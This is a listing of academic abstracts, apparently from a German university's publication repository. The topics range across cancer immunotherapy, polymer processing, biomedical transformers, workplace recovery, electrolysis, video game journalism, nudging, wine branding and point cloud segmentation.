Results: Our analysis showed that (a) nivolumab significantly weakened PD-1 surface expression on CIK cells without impacting other immune checkpoints or PD-1 mRNA expression, (b) this combination strategy showed an effective response on cell viability, IFN-g production, and intracellular release of granzyme B in CD3+ CD56+ CIK cells, but solely in NCI-H2228, (c) the intrinsic expression of Fas ligand (FasL) as a T-cell activation marker in CIK cells was upregulated by this additive effect, and (d) nivolumab induced Foxp3 expression in CD4+CD25+ subpopulation of CIK cells significantly increased. Taken together, we could show that CIK cells in combination with crizotinib and nivolumab can enhance the anti-tumor immune response through FasL activation, leading to increased IFN-g and granzyme B, but only in NCI-H2228 cells with EML4-ALK rearrangement. Therefore, we hypothesize that CIK therapy may be a potential alternative in NSCLC patients harboring EML4-ALK rearrangement, in addition, we support the idea that combination therapies offer significant potential when they are optimized on a patient-by-patient basis.
Process-induced changes in the morphology of biodegradable polybutylene adipate terephthalate (PBAT) and polylactic acid (PLA) blends modified with various multifunctional chainextending cross-linkers (CECLs) are presented. The morphology of unmodified and modified films produced with blown film extrusion is examined in an extrusion direction (ED) and a transverse direction (TD). While FTIR analysis showed only small peak shifts indicating that the CECLs modify the molecular weight of the PBAT/PLA blend, SEM investigations of the fracture surfaces of blown extrusion films revealed their significant effect on the morphology formed during the processing. Due to the combined shear and elongation deformation during blown film extrusion, rather spherical PLA islands were partly transformed into long fibrils, which tended to decay to chains of elliptical islands if cooled slowly. The CECL introduction into the blend changed the thickness of the PLA fibrils, modified the interface adhesion, and altered the deformation behavior of the PBAT matrix from brittle to ductile. The results proved that CECLs react selectively with PBAT, PLA, and their interface. Furthermore, the reactions of CECLs with PBAT/PLA induced by the processing depended on the deformation directions (ED and TD), thus resulting in further non-uniformities of blown extrusion films.
ProtSTonKGs: A Sophisticated Transformer Trained on Protein Sequences, Text, and Knowledge Graphs
(2022)
While most approaches individually exploit unstructured data from the biomedical literature or structured data from biomedical knowledge graphs, their union can better exploit the advantages of such approaches, ultimately improving representations of biology. Using multimodal transformers for such purposes can improve performance on context dependent classication tasks, as demonstrated by our previous model, the Sophisticated Transformer Trained on Biomedical Text and Knowledge Graphs (STonKGs). In this work, we introduce ProtSTonKGs, a transformer aimed at learning all-encompassing representations of protein-protein interactions. ProtSTonKGs presents an extension to our previous work by adding textual protein descriptions and amino acid sequences (i.e., structural information) to the text- and knowledge graph-based input sequence used in STonKGs. We benchmark ProtSTonKGs against STonKGs, resulting in improved F1 scores by up to 0.066 (i.e., from 0.204 to 0.270) in several tasks such as predicting protein interactions in several contexts. Our work demonstrates how multimodal transformers can be used to integrate heterogeneous sources of information, paving the foundation for future approaches that use multiple modalities for biomedical applications.
Recovery Across Different Temporal Settings: How Lunchtime Activities Influence Evening Activities
(2022)
Recovery from work stress during workday breaks, free evenings, weekends, and vacations is known to benefit employee health and well-being. However, how recovery at different temporal settings is interconnected is not well understood. We hypothesized that on days when employees engage in recovery-enhancing lunchtime activities, they will experience higher resources when leaving home from work (i.e., low fatigue and high positive affect) and consequently spend more time on recovery-enhancing activities in the evening, thus creating a positive recovery cycle. In this study, 97 employees were randomized into lunchtime park walk and relaxation groups. As evening activities, we measured time spent on physical exercise, physical activity in natural surroundings, and social activities. Afternoon resources and time spent on evening activities were assessed twice a week before, during, and after the intervention, for five weeks. Our results based on multilevel analyses showed that on days when employees completed the lunchtime park walk, they spent more time on evening physical exercise and physical activity in natural surroundings compared to days when the lunch break was spent as usual. However, neither lunchtime relaxation exercises nor afternoon resources were associated with any of the evening activities. Our findings suggest that other factors than afternoon resources are more important in determining how much time employees spend on various evening activities. Fifteen-minute lunchtime park walks inspired employees to engage in similar healthbenefitting activities during their free time.
Operating an ozone-evolving PEM electrolyser in tap water: A case study of water and ion transport
(2022)
While PEM water electrolysis could be a favourable technique for in situ sanitization with ozone, its application is mainly limited to the use of ultrapure water to achieve a sufficient long-time stability. As additional charge carriers influence the occurring transport phenomena, we investigated the impact of different feed water qualities on the performance of a PEM tap water electrolyser for ozone evolution. The permeation of water and the four most abundant cations (Na+, K+, Ca2+, Mg2+) is characterised during stand-by and powered operation at different charge densities to quantify underlying transport mechanisms. Water transport is shown to linearly increase with the applied current (95 ± 2 mmol A−1 h−1) and occurs decoupled from ion permeation. A limitation of ion permeation is given by the transfer of ions in water to the anode/PEM interface. The unstabilized operation of a PEM electrolyser in tap water leads to a pH gradient which promotes the formation of magnesium and calcium carbonates and hydroxides on the cathode surface. The introduction of a novel auxiliary cathode in the anolytic compartment has shown to suppress ion permeation by close to 20%.
The utilization of simulation procedures is gaining increasing attention in the product development of extrusion blow molded parts. However, some simulation steps, like the simulation of shrinkage and warpage, are still associated with uncertainties. The reason for this is on the one hand a lack of standardized interfaces for the transfer of simulation data between different simulation tools, and on the other hand the complex time-, temperature- and process-dependent material behavior of the used semi crystalline polymers. Using a new vendor neutral interface standard for the data transfer, the shrinkage analysis of a simple blow molded part is investigated and compared to experimental data. A linear viscoelastic material model in combination with an orthotropic process- and temperature-dependent thermal expansion coefficient is used for the shrinkage prediction. A good agreement is observed. Finally, critical parameters in the simulation models that strongly influence the shrinkage analysis are identified by a sensitivity study.
Jet engines of airplanes are designed such that in some components damage occurs and accumulates in service without being critical up to a certain level of damage. Since maintenance, repair, and component exchange are very cost-intensive, it is necessary to predict efficiently the component lifetime with high accuracy. A former developed lifetime model, based on interpolated results of aerodynamic and structural mechanics simulations, uses material parameters estimated from literature values of standard creep experiments. For improved accuracy, an experimental procedure is developed for the characterization of the short-time creep behavior, which is relevant for the operation of turbine blades of jet engines. To consider microstructural influences resulting from the manufacturing of thin-walled single crystal turbine blades, small-scale specimens from used turbine blades are extracted and tested in short- and medium-time creep experiments. Based on experimental results and literature values, a creep model, which describes the fracture behavior for a wide range of creep loads, is calibrated and is now used for the lifetime prediction of turbine blades under real loading conditions.
Hydrogen is a versatile energy carrier. When produced with renewable energy by water splitting, it is a carbon neutral alternative to fossil fuels. The industrialization process of this technology is currently dominated by electrolyzers powered by solar or wind energy. For small scale applications, however, more integrated device designs for water splitting using solar energy might optimize hydrogen production due to lower balance of system costs and a smarter thermal management. Such devices offer the opportunity to thermally couple the solar cell and the electrochemical compartment. In this way, heat losses in the absorber can be turned into an efficiency boost for the device via simultaneously enhancing the catalytic performance of the water splitting reactions, cooling the absorber, and decreasing the ohmic losses.[1,2] However,integrated devices (sometimes also referred to as “artificial leaves”), currently suffer from a lower technology readiness level (TRL) than the completely decoupled approach.
Qualität der Qualitätsprüfung: Testberichte im klassischen und modernen Videospieljournalismus
(2022)
Die Hochzeit des gedruckten Videospieljournalismus um die Jahrtausendwende ist vorüber. Seit über 15 Jahren sind die verkauften Auflagen der klassischen Videospielzeitschriften wie Gamestar oder PC Games rückläufig. Andere Magazine wurden zwischenzeitlich aus wirtschaftlichen Gründen eingestellt, darunter PC Action oder auch der einstige Marktführer Computer Bild Spiele. Trotzdem entwickelte sich eine journalistische Gegenbewegung, die Kieron Gillen im Jahr 2004 in seinem Manifest "The New Games Journalism" begründete. Es entstanden in Deutschland Videospielzeitschriften wie GAIN oder WASD, deren Berichterstattung Videospiele weniger als Produkt, sondern zunehmend als künstlerisches Objekt wahrnehmen und sie in einen gesellschaftlichen und kulturellen Kontext einordnen.
Ungeachtet dessen erfolgt in den Redaktionen eine technische und inhaltliche Sichtung der Videospiele, die dem Publikum als Testbericht präsentiert wird. Da es sich dabei aus historischer Perspektive um den Kerninhalt von Videospielzeitschriften handelt, soll dieser als Analysegegenstand dieser Arbeit dienen und ein Indiz für die Qualität der Magazine als Ganzes sein. Mit Blick auf die unterschiedlichen Entwicklungen im Videospieljournalismus soll folgende Frage beantwortet werden: Verfügen moderne Videospielzeitschriften über eine höhere Qualität als klassische Magazine? Dazu erfolgt eine qualitative Inhaltsanalyse der Testberichte und ein Vergleich mit etablierten Qualitätsmerkmalen aus dem allgemeinen Journalismus, ebenso wie dem Fach-, Nutzwert- und Videospieljournalismus.
Contract-based nature protection schemes are a voluntary mechanism, with a limited contract duration, that aim to raise the acceptance of biodiversity conservation practices in agriculture among farmers and other land users. The purpose of this paper is to analyse the institutional settings of contract-based nature protection based on the– “Institutions of Sustainability” (IoS) framework in the German Rhine-Sieg district, and to outline the way in which policy measures should be designed to encourage farmers to participate in contract-based nature protection programmes. This was achieved by answering research questions to identify the challenges, potentials and obstacles of a contract-based nature protection scheme in different “sub-arenas” as defined in the IoS framework. Qualitative research methods were used as the methodology. The analysis shows that main constraints for sufficient implementation of contract-based nature protection schemes are the limited consideration of the impact of climate change during the contract period, the limited consideration of regional conditions as regards the measures taken on the ground and an inflexible contract duration.
Research has identified nudging as a promising and effective tool to improve healthy eating behavior in a cafeteria setting. However, it remains unclear who is and who is not “nudgeable” (susceptible to nudges). An important influencing factor at the individual level is nudge acceptance. While some progress has been made in determining influences on the acceptance of healthy eating nudges, research on how personal characteristics (such as the perception of social norms) affect nudge acceptance remains scarce. We conducted a survey on 1032 university students to assess the acceptance of nine different types of healthy eating nudges in a cafeteria setting with four influential factors (social norms, health-promoting collaboration, responsibility to promote healthy eating, and procrastination). These factors are likely to play a role within a university and a cafeteria setting. The present study showed that key influential factors of nudge acceptance were the perceived responsibility to promote healthy eating and health-promoting collaboration. We also identified three different student clusters with respect to nudge acceptance, demonstrating that not all nudges were accepted equally. In particular, default, salience, and priming nudges were at least moderately accepted regardless of the degree of nudgeability. Our findings provide useful policy implications for nudge development by university, cafeteria, and public health officials. Recommendations are formulated for strengthening the theoretical background of nudge acceptance and the susceptibility to nudges.
Contextual information is widely considered for NLP and knowledge discovery in life sciences since it highly influences the exact meaning of natural language. The scientific challenge is not only to extract such context data, but also to store this data for further query and discovery approaches. Classical approaches use RDF triple stores, which have serious limitations. Here, we propose a multiple step knowledge graph approach using labeled property graphs based on polyglot persistence systems to utilize context data for context mining, graph queries, knowledge discovery and extraction. We introduce the graph-theoretic foundation for a general context concept within semantic networks and show a proof of concept based on biomedical literature and text mining. Our test system contains a knowledge graph derived from the entirety of PubMed and SCAIView data and is enriched with text mining data and domain-specific language data using Biological Expression Language. Here, context is a more general concept than annotations. This dense graph has more than 71M nodes and 850M relationships. We discuss the impact of this novel approach with 27 real-world use cases represented by graph queries. Storing and querying a giant knowledge graph as a labeled property graph is still a technological challenge. Here, we demonstrate how our data model is able to support the understanding and interpretation of biomedical data. We present several real-world use cases that utilize our massive, generated knowledge graph derived from PubMed data and enriched with additional contextual data. Finally, we show a working example in context of biologically relevant information using SCAIView.
Unlimited paid time off policies are currently fashionable and widely discussed by HR professionals around the globe. While on the one hand, paid time off is considered a key benefit by employees and unlimited paid time off policies (UPTO) are seen as a major perk which may help in recruiting and retaining talented employees, on the other hand, early adopters reported that employees took less time off than previously, presumably leading to higher burnout rates. In this conceptual review, we discuss the theoretical and empirical evidence regarding the potential effects of UPTO on leave utilization, well-being and performance outcomes. We start out by defining UPTO and placing it in a historical and international perspective. Next, we discuss the key role of leave utilization in translating UPTO into concrete actions. The core of our article constitutes the description of the effects of UPTO and the two pathways through which these effects are assumed to unfold: autonomy need satisfaction and detrimental social processes. We moreover discuss the boundary conditions which facilitate or inhibit the successful utilization of UPTO on individual, team, and organizational level. In reviewing the literature from different fields and integrating existing theories, we arrive at a conceptual model and five propositions, which can guide future research on UPTO. We conclude with a discussion of the theoretical and societal implications of UPTO.
Composite nanoparticles (NPs) consisting of lignin and different polysaccharide (PS) derivatives were prepared. In this synergistic approach, the PS derivative acts as biocompatible matrix that forms spherical NPs while lignin is a functional compound with therapeutic potential (e.g., antioxidative, antimicrobial, antiviral). Organosolv lignin and three different PS derivatives (cellulose acetate/CA, cellulose acetate phthalate/CAPh, xylan phenyl carbonate/XPC) were used in this study. Nanocomposites with particle sizes in the range of about 200–550 nm containing both types of biopolymers are accessible by dialysis of organic PS/lignin solutions against water. In particular, XPC and CAPh, which both contain aromatic substituents, were found to be suitable for incorporation of lignin within the PS nanomatrix. The present work paves the way for future studies in which the pharmaceutical potential and biocompatibility of composite NPs of lignin and PS derivatives with tailored properties are investigated.
Characterization methods of pressure sensitive adhesives (PSA) originate from technical bonding and do not cover relevant data for the development and quality assurance of medical applications, where PSA with flexible backing layers are adopted to human skin. In this study, a new method called RheoTack is developed to determine (mechanically and optically) an adhesion and detaching behavior of flexible and transparent PSA based patches. Transdermal therapeutic systems (TTS) consisting of silicone-based PSAs on a flexible and transparent backing layer were tested on a rotational rheometer with an 8 mm plate as a probe rod at retraction speeds of 0.01, 0.1, and 1 mm/s with respect to their adhesion and detaching behavior in terms of force-retraction displacement curves. The curves consist of a compression phase to affirm wetting; a tensile deformation phase intercepting stretching, cavity, and fibril formation; and a failure phase with detaching. Their analysis provides values for stiffness, force, and displacement of the beginning of fibril formation, force and displacement of the beginning of a failure due to fibril breakage and detaching, as well as corresponding activation energies. All these parameters exhibit the pronounced dependency on the retraction speed. The force-retraction displacement curves together with the simultaneous video recordings of the TTS deformation from three different angles (three cameras) provide deeper insight into the deformation processes and allow for interpreting the properties’ characteristics for PSA applications.
The Poverty Reduction Effect of Social Protection: The Pros and Cons of a Multidisciplinary Approach
(2022)
There is a growing body of knowledge on the complex effects of social protection on poverty in Africa. This article explores the pros and cons of a multidisciplinary approach to studying social protection policies. Our research aimed at studying the interaction between cash transfers and social health protection policies in terms of their impact on inclusive growth in Ghana and Kenya. Also, it explored the policy reform context over time to unravel programme dynamics and outcomes. The analysis combined econometric and qualitative impact assessments with national- and local-level political economic analyses. In particular, dynamic effects and improved understanding of processes are well captured by this approach, thus, pushing the understanding of implementation challenges over and beyond a ‘technological fix,’ as has been argued before by Niño-Zarazúa et al. (World Dev 40:163–176, 2012), However, multidisciplinary research puts considerable demands on data and data handling. Finally, some poverty reduction effects play out over a longer time, requiring longitudinal consistent data that is still scarce.
Purpose: Both Hungary and Germany belong to the old-world wine-producing countries and have long winemaking traditions. This paper aims at exploring and comparing online branding strategies of family SME (small and medium sized enterprises) wineries at Lake Balaton (Hungary) and Lake Constance (Germany), as two wine regions with similar geographic characteristics.
Design/methodology/approach: This paper, based on a total sample of 37 family wineries, 15 at Lake Balaton and 22 at Lake Constance, investigates the differences in brand identity on the website, brand image in social media and online communication channels deployed in both wine regions. The study applies a qualitative methodology using MaxQDA software for conducting content analysis of texts in websites and social media. Descriptive statistics and t-test were conducted to compare the usage of different communication channels and determine statistical significance.
Findings: At Lake Balaton, the vineyard, the winery and the family, while at Lake Constance, the lake itself and the grape are highlighted regarding family winery brand identity. The customer-based brand image of Hungarian family wineries emphasizes wine, food and service, with the predominant use of Facebook. In the German family wineries, the focus of brand identity is on wine, friendliness and taste and includes more extensive usage of websites.
Originality/value: The paper deploys a novel methodology, both in terms of tools used as well as geographic focus to uncover online branding patterns of family wineries, thereby providing implications for wine and tourism industries at lake regions. It compares the share of selected most-used words in the overall text in websites and in social media, and presents the key findings from this innovative approach.
Effective Neighborhood Feature Exploitation in Graph CNNs for Point Cloud Object-Part Segmentation
(2022)
Part segmentation is the task of semantic segmentation applied on objects and carries a wide range of applications from robotic manipulation to medical imaging. This work deals with the problem of part segmentation on raw, unordered point clouds of 3D objects. While pioneering works on deep learning for point clouds typically ignore taking advantage of local geometric structure around individual points, the subsequent methods proposed to extract features by exploiting local geometry have not yielded significant improvements either. In order to investigate further, a graph convolutional network (GCN) is used in this work in an attempt to increase the effectiveness of such neighborhood feature exploitation approaches. Most of the previous works also focus only on segmenting complete point cloud data. Considering the impracticality of such approaches, taking into consideration the real world scenarios where complete point clouds are scarcely available, this work proposes approaches to deal with partial point cloud segmentation.
In the attempt to better capture neighborhood features, this work proposes a novel method to learn regional part descriptors which guide and refine the segmentation predictions. The proposed approach helps the network achieve state-of-the-art performance of 86.4% mIoU on the ShapeNetPart dataset for methods which do not use any preprocessing techniques or voting strategies. In order to better deal with partial point clouds, this work also proposes new strategies to train and test on partial data. While achieving significant improvements compared to the baseline performance, the problem of partial point cloud segmentation is also viewed through an alternate lens of semantic shape completion.
Semantic shape completion networks not only help deal with partial point cloud segmentation but also enrich the information captured by the system by predicting complete point clouds with corresponding semantic labels for each point. To this end, a new network architecture for semantic shape completion is also proposed based on point completion network (PCN) which takes advantage of a graph convolution based hierarchical decoder for completion as well as segmentation. In addition to predicting complete point clouds, results indicate that the network is capable of reaching within a margin of 5% to the mIoU performance of dedicated segmentation networks for partial point cloud segmentation.